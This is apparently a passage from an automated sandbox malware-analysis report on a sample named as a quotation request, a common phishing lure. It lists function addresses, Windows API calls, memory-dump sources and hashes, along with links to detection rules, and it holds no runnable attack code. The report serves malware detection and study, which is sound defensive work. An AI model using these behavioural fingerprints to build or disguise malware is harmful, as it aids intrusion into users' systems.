                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7c9d808aa444063240477e641974362d9ba538f68445c3a083bf48e6badcfc93
                                                                                                                    • Instruction ID: 0090b7d765d7b87a5ee217da7eee1225bcca86d9e6ece99cde7923f3a325f41b
                                                                                                                    • Opcode Fuzzy Hash: 7c9d808aa444063240477e641974362d9ba538f68445c3a083bf48e6badcfc93
                                                                                                                    • Instruction Fuzzy Hash: 22014FF2A0561A7EF62116786CC1F677A2DEF413B8B340326FD31611D2DB649C847160
                                                                                                                    Function 00F71A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F71A47
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F71A59
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F71A6F
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F71A8A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: 34d62d75c09fea3622209528c037ead3031bee3914008355c44dac1cf209f942
                                                                                                                    • Instruction ID: 0802b0c18bd8d2fc9ccf32cda9a7c5438bd58c724df06b29770b737d985a619e
                                                                                                                    • Opcode Fuzzy Hash: 34d62d75c09fea3622209528c037ead3031bee3914008355c44dac1cf209f942
                                                                                                                    • Instruction Fuzzy Hash: 58110C7AD01219FFEB11DBA9CD85FADBB78FB08750F204092E604B7290D6716E50EB94
                                                                                                                    Function 00F7E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00F7E1FD
                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00F7E230
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F7E246
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F7E24D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2880819207-0
                                                                                                                    • Opcode ID: a962e213e901ebbf5ec39e2881d9b25d92fdd27b7bacd51f740b6ff82d54e51d
                                                                                                                    • Instruction ID: b9da5eff80b57ad3ca0720c5ab6602c484c44ac80b9ab13f4495c2e589b4c1ab
                                                                                                                    • Opcode Fuzzy Hash: a962e213e901ebbf5ec39e2881d9b25d92fdd27b7bacd51f740b6ff82d54e51d
                                                                                                                    • Instruction Fuzzy Hash: 47112BB2E0425CBFC7019FA89C45A9F7FADAB45320F008257F818D7291D670CD00A7A1
                                                                                                                    Function 00F3D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNEL32(00000000,?,00F3CFF9,00000000,00000004,00000000), ref: 00F3D218
                                                                                                                    • GetLastError.KERNEL32 ref: 00F3D224
                                                                                                                    • __dosmaperr.LIBCMT ref: 00F3D22B
                                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 00F3D249
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 173952441-0
                                                                                                                    • Opcode ID: 5d83678ee5d747c94c4e95bf80c74f6d593348290aad5f3215c3d014faa1a02c
                                                                                                                    • Instruction ID: 90173a997b3dc12643d340cb41cba3c9d366a9023650074a13042030c5efecc3
                                                                                                                    • Opcode Fuzzy Hash: 5d83678ee5d747c94c4e95bf80c74f6d593348290aad5f3215c3d014faa1a02c
                                                                                                                    • Instruction Fuzzy Hash: B101D276805208BBDB216BA5EC09BAB7A69DF82731F100229F925921D0CF71C905E6A0
                                                                                                                    Function 00FA9EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00FA9F31
                                                                                                                    • GetCursorPos.USER32(?), ref: 00FA9F3B
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FA9F46
                                                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00FA9F7A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4127811313-0
                                                                                                                    • Opcode ID: 54af17434b699d0a27471f8f6fcbe240abba0fb52404f5c8b1a11c4328f8ab92
                                                                                                                    • Instruction ID: 46b0dbfb5859e49f49025a0984060d0d44095f7eacab093be9512733d6dee6c4
                                                                                                                    • Opcode Fuzzy Hash: 54af17434b699d0a27471f8f6fcbe240abba0fb52404f5c8b1a11c4328f8ab92
                                                                                                                    • Instruction Fuzzy Hash: EC1136B290415AAFDF10DF69DC859EE77B8FB46311F000461FA11E7141D374BA81EBA1
                                                                                                                    Function 00F1600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F1604C
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00F16060
                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F1606A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3970641297-0
                                                                                                                    • Opcode ID: db5b076c67e4dd3546d76e3999a0af83f14fa5dc7965dd30b792aaac2de22b3a
                                                                                                                    • Instruction ID: 5f0be766a10e3a9cdd354beab04df7f7d50b96ab4a0470fa082fec099b65aa96
                                                                                                                    • Opcode Fuzzy Hash: db5b076c67e4dd3546d76e3999a0af83f14fa5dc7965dd30b792aaac2de22b3a
                                                                                                                    • Instruction Fuzzy Hash: EC115BB2501548BFEF128FA49C44AEABBA9EF0D3A4F040215FA1492110D7329CA0FBA0
                                                                                                                    Function 00F33B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00F33B56
                                                                                                                      • Part of subcall function 00F33AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00F33AD2
                                                                                                                      • Part of subcall function 00F33AA3: ___AdjustPointer.LIBCMT ref: 00F33AED
                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00F33B6B
                                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00F33B7C
                                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00F33BA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 737400349-0
                                                                                                                    • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                    • Instruction ID: 9e5e932ea68d3dbcd64d8f127b9e5014d5130a7a4f7b72e24fa702bf94ee80dc
                                                                                                                    • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                    • Instruction Fuzzy Hash: 1F01E972500149BBDF129E95CC46EEB7B69EF98764F044014FE48A6121C73AE961EBA0
                                                                                                                    Function 00F43073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00F113C6,00000000,00000000,?,00F4301A,00F113C6,00000000,00000000,00000000,?,00F4328B,00000006,FlsSetValue), ref: 00F430A5
                                                                                                                    • GetLastError.KERNEL32(?,00F4301A,00F113C6,00000000,00000000,00000000,?,00F4328B,00000006,FlsSetValue,00FB2290,FlsSetValue,00000000,00000364,?,00F42E46), ref: 00F430B1
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F4301A,00F113C6,00000000,00000000,00000000,?,00F4328B,00000006,FlsSetValue,00FB2290,FlsSetValue,00000000), ref: 00F430BF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3177248105-0
                                                                                                                    • Opcode ID: 5b75f349f812fcc0904b785cbd0d81854fecb4e1de48b6b80c0ac97069c64e91
                                                                                                                    • Instruction ID: 369c8e6412267f548f5d6a6854e56ac9b8c6386594470e2b02795e41b1c40a0a
                                                                                                                    • Opcode Fuzzy Hash: 5b75f349f812fcc0904b785cbd0d81854fecb4e1de48b6b80c0ac97069c64e91
                                                                                                                    • Instruction Fuzzy Hash: 5301DB76701226ABCB314B7D9C85A577FD8EF46B75B210720FD05E7140DB21D901E6E0
                                                                                                                    Function 00F77464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00F7747F
                                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F77497
                                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F774AC
                                                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F774CA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352324309-0
                                                                                                                    • Opcode ID: 069b0e8b26421019b28113de3067771ad46e836e65227fc0c6ef9039c66e0ad6
                                                                                                                    • Instruction ID: c301dac4a56817474eb8258527eca452a53c9c112facde7c14326a08ff237ddf
                                                                                                                    • Opcode Fuzzy Hash: 069b0e8b26421019b28113de3067771ad46e836e65227fc0c6ef9039c66e0ad6
                                                                                                                    • Instruction Fuzzy Hash: 111161B5219315DBE720DF24DC09F927FFCEB04B04F10C56AAA5AD6191D7B0E904EB92
                                                                                                                    Function 00F7B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F7ACD3,?,00008000), ref: 00F7B0C4
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F7ACD3,?,00008000), ref: 00F7B0E9
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F7ACD3,?,00008000), ref: 00F7B0F3
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F7ACD3,?,00008000), ref: 00F7B126
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2875609808-0
                                                                                                                    • Opcode ID: 876203871653c9f4c0fc3f4192745603528432d502f9cfb29aca35d1992ac5f6
                                                                                                                    • Instruction ID: 0a37c44b0ff2f815a3f5a830a66137c83d34d3b9480c924cf21c9cd377656e5c
                                                                                                                    • Opcode Fuzzy Hash: 876203871653c9f4c0fc3f4192745603528432d502f9cfb29aca35d1992ac5f6
                                                                                                                    • Instruction Fuzzy Hash: B6118B71E0152CE7CF00AFE4E9687EEBB78FF0A311F108086D945B2181CB704651EB92
                                                                                                                    Function 00F72DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F72DC5
                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F72DD6
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00F72DDD
                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F72DE4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2710830443-0
                                                                                                                    • Opcode ID: ef3f3c3d47b10b5ae82e8a1df5f961be80adcbc7d30f7c05385c1fd7dfc30202
                                                                                                                    • Instruction ID: 4918c081794212979daeb782d06a014d2ea8e42df73ae2429b7ab961a53484ec
                                                                                                                    • Opcode Fuzzy Hash: ef3f3c3d47b10b5ae82e8a1df5f961be80adcbc7d30f7c05385c1fd7dfc30202
                                                                                                                    • Instruction Fuzzy Hash: 04E06DB26012287AD7205B639C0DFEB3E6CEB43BA1F004016B109D11809AA08840E6F1
                                                                                                                    Function 00FA8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F29639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F29693
                                                                                                                      • Part of subcall function 00F29639: SelectObject.GDI32(?,00000000), ref: 00F296A2
                                                                                                                      • Part of subcall function 00F29639: BeginPath.GDI32(?), ref: 00F296B9
                                                                                                                      • Part of subcall function 00F29639: SelectObject.GDI32(?,00000000), ref: 00F296E2
                                                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00FA8887
                                                                                                                    • LineTo.GDI32(?,?,?), ref: 00FA8894
                                                                                                                    • EndPath.GDI32(?), ref: 00FA88A4
                                                                                                                    • StrokePath.GDI32(?), ref: 00FA88B2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1539411459-0
                                                                                                                    • Opcode ID: 15f98967df03a51305d91d880b10f9e5f0dedce26448059f81b39f6e857d7e65
                                                                                                                    • Instruction ID: 7ddecf090f3625819705af2b246590aea2b0224a3f149cd1206c815c4b4664e0
                                                                                                                    • Opcode Fuzzy Hash: 15f98967df03a51305d91d880b10f9e5f0dedce26448059f81b39f6e857d7e65
                                                                                                                    • Instruction Fuzzy Hash: B4F03A76045258BADB125F94AC0DFCE3F59AF06310F448000FA11A50E2CBB95511EBE9
                                                                                                                    Function 00F298B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000008), ref: 00F298CC
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00F298D6
                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00F298E9
                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00F298F1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4037423528-0
                                                                                                                    • Opcode ID: 6c16219b8a4ee1b8254383ae528bdda508788c70e94f635608260d02592ef8e5
                                                                                                                    • Instruction ID: d4494bb5f9f90e8f0d67471d86bfcad8bfb2490d497f8809a7b80651a3a0387f
                                                                                                                    • Opcode Fuzzy Hash: 6c16219b8a4ee1b8254383ae528bdda508788c70e94f635608260d02592ef8e5
                                                                                                                    • Instruction Fuzzy Hash: 6CE06D71644288AEDB216B74BC09BE83F60EB13736F088219F6FA580E1C7724680AB10
                                                                                                                    Function 00F7162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00F71634
                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F711D9), ref: 00F7163B
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F711D9), ref: 00F71648
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F711D9), ref: 00F7164F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3974789173-0
                                                                                                                    • Opcode ID: e4278f2f94680fbf701a073f8e9698c04f8170203ab649d23502518159a9e5e7
                                                                                                                    • Instruction ID: 5caadc0f98027b22dac22709af86485a52ec30aea1e58916edb6d9adcd838015
                                                                                                                    • Opcode Fuzzy Hash: e4278f2f94680fbf701a073f8e9698c04f8170203ab649d23502518159a9e5e7
                                                                                                                    • Instruction Fuzzy Hash: AEE086B1A01215DBD7201FA49D0DB473BBCBF467A1F14C809F245C9080D6344544E791
                                                                                                                    Function 00F6D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDesktopWindow.USER32 ref: 00F6D858
                                                                                                                    • GetDC.USER32(00000000), ref: 00F6D862
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F6D882
                                                                                                                    • ReleaseDC.USER32(?), ref: 00F6D8A3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
